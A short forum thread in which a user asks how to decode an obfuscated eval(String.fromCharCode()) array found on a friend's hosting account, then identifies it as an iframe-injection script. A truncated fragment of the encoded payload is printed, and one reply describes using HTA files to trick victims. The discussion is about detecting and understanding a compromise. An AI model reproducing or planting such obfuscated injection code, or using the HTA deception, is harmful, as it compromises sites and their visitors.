Javascript 'eval' Function

[jlhaslip]

A friend from another Forum has a mysterious file on their hosting account and it uses a javascript eval function with a series of data (numbers) in an array. Any idea how to 'decipher' the digits to see what the function is supposed to be doing?

118,97,114,32,10, ... 34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,51,49,49,51,61,57,43,55,5 ... 14,32,109,110,98,113,61,52,51,48,52,49,56,50,52

That is the string found on the page inside script tags

<script type="text/javascript">

and

eval(String.fromCharCode())

is the function in question.Would this string be dangerous on a web site?How to translate those digits into readable text?***Please be careful with this data, as the friend suspects it may be malware ***

[jlhaslip]

Cancel this one... found it.http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/An Iframe injection script.

[Synook]

It's not technically "malware"... but how did they get it on their account in the first place?

[jlhaslip]

Not sure. Checking the FTP/http logs as we speak.

[rawker]

*.hta(HTML Application) is far more dangerous, especially to those who are not aware the horror it could bring to your PC(Windows). Imagine an innocent HTML File that has access to your File System. Although, you still have to download the application before you can execute it. You can use that technique to wreak havoc since your victim might think that it's just harmless numbers. What they don't know is... that it's the code of doom.

[inktherapy]

Up!Any updates on these strange numbers on how did it get there?

[justsomeguy]

Can you post the entire Javascript code if you still have it? I'm curious to decode it and see what it's actually doing.